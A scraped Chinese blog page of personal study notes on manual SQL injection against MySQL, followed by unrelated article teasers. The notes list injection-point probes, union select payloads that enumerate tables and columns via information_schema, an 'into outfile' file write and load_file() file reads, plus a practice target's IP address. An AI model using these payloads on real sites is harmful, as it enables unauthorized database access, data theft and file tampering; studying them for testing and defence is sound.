程序员经验分享-hwhale

2021-4-4 sql注入

2023-11-11

user() 函数
user() 这个函数, 是取得 当前登陆的用户.
| root@localhost |

exists()函数
exist() 检查是否存在 (对语句结果检查)
select exists(select 1)

返回布尔值 0或1
0是假,1是真

1.判断注入点

  1. 单引号判断
    ?id=10’ 如果出现错误提示,则该网站可能就存在注入漏洞。

  2. and判断
    ?id=10’and 1=1这个条件永远都是真的,所以当然返回是正常页
    ?id=10’and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。

  3. or判断
    (or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)
    ?id=10’or 1=1
    ?id=10’or 1=2

  4. xor判断
    (xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)
    http://www.xxx.com/xxx.asp?id=10’xor 1=1
    http://www.xxx.com/xxx.asp?id=10’xor 1=2

  5. 加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)
    http://www.xxx.com/xxx.asp?id=10-0
    http://www.xxx.com/xxx.asp?id=10-1
    http://www.xxx.com/xxx.asp?id=10+1

  6. 输入框判断
    可以使用特殊符号去判断
    #@!$/ …

http://120.24.86.145:9001/sql/
登录框注入,使用#,–都无效,但是使用\报错,这时候上sqlmap,发现可以注入。但是如何进行手工注入?

2.order by
注入点查询的语句有多少个列名(几个字段)

3.and exists()
怎么知道表名
and exists(select * from table_name)
and exists(select column_name from table_name)

4.union select…


搜索型注入、读、写文件

字符型查找(like)
?title=mmmmmmm%’ --+

例:select * from news where title like’%mmmmmmm%’ – %’

数据库名
database()
from ab_name.table_name
from information_schema.tables
where table_schema=‘sqltest’ and table_name<>'admin ’

  • information_schema这张数据表保存了MySQL服务器所有数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。
    获取表名:
union select 1,table_name,3 from information_schema.tables where table_schema='bookdb' and table_name<>'admin';


union select 1,table_name,3 from information_schema.columns where table_schema='bookdb' and table_name<>'admin';

获取列名:

union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='bookdb' and table_name='admin';

写入文件

union select 1,"hackedbyhelen",3 into outfile "D:/WWW/key.txt" --+

写入需要的条件:

1.绝对路径
D:\ \WWW
D:/WWW

2.必须为最高权限
mysql - root

读取文件:
load_file() 导入文件

replace() 替换

hex() 把你读取的文件内容转换为16进制

union select 1,hex(load_file(ceeeeeefdeeef0)),3  --+
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

2021-4-4 sql注入 的相关文章

  • Vue(五)——调试

    一 console输出到控制台 如果Vue项目中 使用了eslint loader 代码规范 空格 缩进 console等测试语句 的话 就没法使用console 一定需要使用console可以尝试关闭eslint loader 在vue

  • Spring 如何从 IoC 容器中获取对象?

    前情回顾 前面几篇文章主要分析了 Spring IoC 容器如何初始化 以及解析和注册我们定义的 bean 信息 其中 Spring 中的 IoC 容器 对 Spring 中的容器做了一个概述 Spring IoC 容器初始化 和 Spri

  • 碰到了version `GLIBC_2.27' not found错误

    碰到了version GLIBC 2 27 not found错误 我查了下 因为glibc是系统级底层软件 自己编译的可能会跟原来的不一致 会导致系统不兼容 结果我在 etc ld so conf里面添加了 opt glibc 2 27的

  • C++/C笔试面试题目大大的集合

    C C笔试面试题目大大的集合 2010 10 22 00 08 3742人阅读 评论 0 收藏 举报 面试 c string 编译器 null 设计模式 1 const 有什么用途 请至少说明两种 答 1 可以定义 const 常量 2 c

  • 基于PHP的简单微博系统

    一 项目介绍 基于PHP的简单微博系统 php mysql apache开发 适合新手练习 可搭建在phpstudy下 有完整的sql文件和配置文件 三分钟快速部署 二 主要功能 1 注册 登录微博 2 个人中心 个人信息修改 查看我的关注

  • 【官方文档】《暗黑世界GM管理后台系统》部署+功能说明

    欢迎来到9秒 www 9miao com 暗黑三国管理后台说明文档 一 功能描述 该后台共分为三大部分 服务器管理 单服数据统计和扶持账号管理 1 服务器管理 根据管理后台数据库中填写的服务器信息 后面会讲到如何填写要管理的服务器的信息到数

  • golang http请求时设置代理ip

    在http Client中自定义Transport 设置Proxy即可 目前网上存在很多代理ip网站 本人也写过一些代理ip网址的爬取 见 GitHub 如果需要代理验证 那么如下进行设置 否则直接设置为url Parse http inp

  • CSS设计指南(第3版)》

    CSS设计指南 第3版 基本信息 原书名 Stylin with CSS a designer s guide 作者 英 Charles Wyke Smith 译者 李松峰 丛书名 图灵程序设计丛书 出版社 人民邮电出版社 ISBN 978

  • ATL与COM之间的关系、ATL的特点与基本使用方法

    ATL Active Template Library活动模板库 是一种微软程序库 支持利用C 语言编写ASP代码以及其它ActiveX程序 通过活动模板库 可以建立COM组件 然后通过ASP页面中的脚本对COM对象进行调用 这种COM组件

  • [R语言]R包的安装&帮助获取

    本文主要参考 Paul Teetor R语言经典实例 一书 在R语言中 包含的包中有各种应用函数 1 install packages packagename 安装R包 library package name 载入包 对于base包可省略

  • CentOS7安装oracle19c

    教程 https zhuanlan zhihu com p 571737575 CentOS7安装oracle19c教程 https zhuanlan zhihu com p 571737575 一 准备工作 1创建 oracle 用户 以

  • 关于指针

    指针的一些基础知识 1 指针的定义 数据在内存中的地址也称为指针 如果一个变量存储了一份数据的指针 我们就称它为指针变量 在C语言中 允许用一个变量来存放指针 这种变量称为指针变量 指针变量的值就是某份数据的地址 这样的一份数据可以是数组

  • 利用docker部署TF深度学习模型(附件文件较大,并无上传。部署参考步骤即可)

    一 介绍 docker Docker 是一个开源的应用容器引擎 基于 Go 语言 并遵从 Apache2 0 协议开源 Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级 可移植的容器中 然后发布到任何流行的 Linux 机器上

  • 预编译过程中的相关知识点

    1 文件包含顺序 在头文件中 1 包含自定义头文件 2 包含第三方库的头文件 3 包含标准库头文件 在源文件中 1 包含该源文件对应的头文件 2 包含自定义头文件 3 包含第三方库的头文件 4 包含标准库头文件

  • 【Python】pip安装opencv-python包失败与换清华源提速

    文章目录 出现的问题 解决的方法 换源 出现的问题 在Windows10系统中 在cmd中 或者在pycharm的Terminal中 输入pip install opencv python会出现如下报错 ERROR Exception Tr

  • Python:ImportError: DLL load failed:找不到指定的模块 解决方案

    解决方法 检查numpy scipy matplotlib scikit learn的版本是否更新到最新且符合当前Python版本 如果出现不是最新的版本 先卸载该版本 windows pip uninstall numpy 再去http

  • 2019下半年阿里面试失败总结

    结果预览 2年半第一次出去面试 也是第一次面试阿里 打击不小 收货也不少 最终倒在二面笔试题上 虽有不甘 但仍需收拾心情 继续努力 一面总结 在一面上 跟网上大多数的反馈相同 都是比较Java基础项 然后往深度问 我整理了下 因为我简历上写

  • springmvc <mvc:annotation-driven/><mvc:default-servlet-handler/>区别 ssm整合

    文章目录 概述 概念和核心 什么是MVC springmvc第一个程序搭建 先到依赖 idea搭建项目 eclipse搭建 在spirngmvc xml配置文件写上这个 web xml写上servlet配置 匹配优先级 流程和原理 执行流程

  • 一文解读flowable工作流

    flowable工作流的定义 流程 及项目使用 flowable工作流 1 flowable 1 1 定义 1 2 作用 1 3 流程 2 使用实例 2 1 引入pom依赖 2 2 yml文件 2 3 审批流程xml 2 4 引擎配置类 2

  • 【模板】二分

    文章目录 1 整数二分 1 1 寻找 x 或 x 的后继 1 2 寻找 x 或 x 的前驱 1 3 模板 1 4 解题步骤 2 实数二分 本文的二分模板来自 算法竞赛进阶指南 1 整数二分 对于整数域上的二分 需要注意终止边界 左右区间取舍

随机推荐

  • windows消息机制详解

    前言 windows是一个消息驱动的系统 windows的消息提供了应用程序之间 应用程序与windows 系统之间进行通信的手段 要想深入理解windows 消息机制的知识是必不可少的 基础 进程接收来自于鼠标 键盘等其他消息都是通过消息

  • [C/C++]函数的栈空间(避免栈空间溢出)

    个人主页 北 海 CSDN新晋作者 欢迎 点赞 评论 收藏 收录专栏 C C 希望作者的文章能对你有所帮助 有不足的地方请在评论区留言指正 大家一起学习交流 错误1 当数组的内存占用较大时 会引发异常 include

  • 手把手使用Micropython+合宙Esp32c3(驱动安装,为合宙Esp32c3安装Micropython固件库,代码上传到ESP32C3中)含Thonny和vscode两种方法

    文章目录 驱动安装 为合宙Esp32c3安装Micropython固件库 1 Micropython简介 2 Micropython解释器下载 Thonny解释器 VScode 3 ESP32C3固件库下载以及安装 固件库下载 固件库安装

  • dorado 产品简介

    dorado展现中间件是快速创建Rich Internet Application的表现层解决方案 dorado包含运行平台与开发工具 dorado可以广泛应用于各行业管理类web软件项目或产品中 dorado提高了Web应用的可用性 降低

  • 同步和异步的区别、例子

    一 同步 异步的区别 同步 是所有的操作都做完 才返回给用户结果 即写完数据库之后 在相应用户 用户体验不好 异步 不用等所有操作等做完 就相应用户请求 即先相应用户请求 然后慢慢去写数据库 用户体验较好 同步 同步的思想是 所有的操作都做

  • 《NoSQL精粹》摘要0-前言

    这个就是首页的摘要了 哈哈 当然 酱油不是这么打的 这样是要被鞭尸的 以下就是读 NoSQL精粹 的前言的摘要 当然咯 不是照抄照搬 所以有出入之处 还请指出 见谅 稳定性在数据存储领域一直颇受重视 因为企业的数据比程序存储的时间要长很多

  • bpmn-js起步

    通过本文逐步熟悉bpmn js 快速介绍 bpmn js是一个BPMN2 0渲染工具包和web建模器 使用JavaScript编写 在不需要后端服务器支持的前提下向现代浏览器内嵌入BPMN2 0流程图 这使得它很容易的嵌入到任何web应用中

  • 爬虫基础篇之Scrapy抓取京东

    虚拟环境 同一台服务器上不同的项目可能依赖的包不同版本 新版本默认覆盖旧版本 可能导致其他项目无法运行 通过虚拟环境 完全隔离各个项目各个版本的依赖包 实现运行环境互不影响 virtualenv pip install virtualenv

  • Citespace教程笔记

    1 Citespace分析和解读策略 课程连接 citespace教程 陈超美老师亲自教学 哔哩哔哩 bilibili 分析结果那些重要 那些次要 要从主到次地分析 2 Citespace软件界面简介 2 1 Citespace功能参数界面

  • java web和jsp页面的区别

    javaweb是使用java语言进行web系统开发 web系统开发 Java在web开发上处于领导地位 现在主流的是MVC的三层架构 而jsp就是页面表现层的首选 因为它出现的比较早 技术相对成熟和普及 这就是最为流行的J2EE技术 关系就

  • 最小二乘法详细推导过程

    转载自 http blog csdn net marsjohn article details 54911788 在数据的统计分析中 数据之间即变量x与Y之间的相关性研究非常重要 通过在直角坐标系中做散点图的方式我们会发现很多统计数据近似一

  • NOI-OJ 1.13 ID:11 回文素数

    NOI OJ 1 13 ID 11 回文素数 总时间限制 5000ms 内存限制 65536kB 描述 一个数如果从左往右读和从右往左读数字是相同的 则称这个数是回文数 如121 1221 15651都是回文数 给定位数n 找出所有既是回文

  • pr不支持mov怎么办_Premiere不支持MOV怎么办?怎么快速解决?

    原标题 Premiere不支持MOV怎么办 怎么快速解决 现在网上视频素材的质量参差不齐 而且下载的渠道很多 所以不少视频下载到本地后 都因为编码不规范而不能导入premiere中 一些MOV格式的视频也是这样 premiere是不支持的而

  • 【数据结构常见七大排序(一)】—插入排序篇【直接插入排序】And【希尔排序】

    目录 1 排序的概念及其运用 1 1排序的概念 1 2排序运用 1 3常见的七大排序 2 直接插入排序 2 1基本思想 2 2直接插入排序 2 3动图助解 2 4直接插入排序源码 2 5直接插入排序的特性总结 3 希尔排序 缩小增量排序 3

  • 【Java练习题】输出n行杨辉三角

    1 题目描述 杨辉三角的两个边都是1 内部其它都是肩上两个数的和 2 做题思路 杨辉三角开头和结尾都是1 杨辉三角第i行第j列元素是上一行i 1的元素和它前一个元素的和 公式表示 list i j list i 1 j list i 1 j

  • 最小二乘法——拟合平面方程(深度相机外参标定、地面标定)

    1 最小二乘法 最小二乘法 又称最小平方法 是一种数学优化技术 它通过最小化误差的平方和寻找数据的最佳函数匹配 利用最小二乘法可以简便地求得未知的数据 并使得这些求得的数据与实际数据之间误差的平方和为最小 最小二乘法还可用于曲线拟合 其他一

  • IDDPM官方gituhb项目--训练

    在完成IDDPM论文学习后 对github上的官方仓库进行学习 通过具体的代码理解算法实现过程中的一些细节 官方仓库代码基于pytorch实现 链接为https github com openai improved diffusion 本笔

  • 【论文阅读】POI2Vec: Geographical Latent Representation for Predicting Future Visitors

    POI2Vec Geographical Latent Representation for Predicting Future Visitors Shanshan Feng Gao Cong Bo An Yeow Meng Chee 20

  • 少儿编程和机器人编程哪个更好一点

    少儿编程和机器人编程哪个更好 孩子的学习一直都是家长们非常关心和重视一件事 很多的家长在培养孩子学习的时候 会给孩子选择一些能够有利于孩子成长的课程 就拿现在很多的家长想要孩子去学习机器人编程的课程来说 有的家长对于少儿编程和机器人编程哪个

  • 2021-4-4 sql注入

    user 函数 user 这个函数 是取得 当前登陆的用户 root localhost exists 函数 exist 检查是否存在 对语句结果检查 select exists select 1 返回布尔值 0或1 0是假 1是真 1 判

热门标签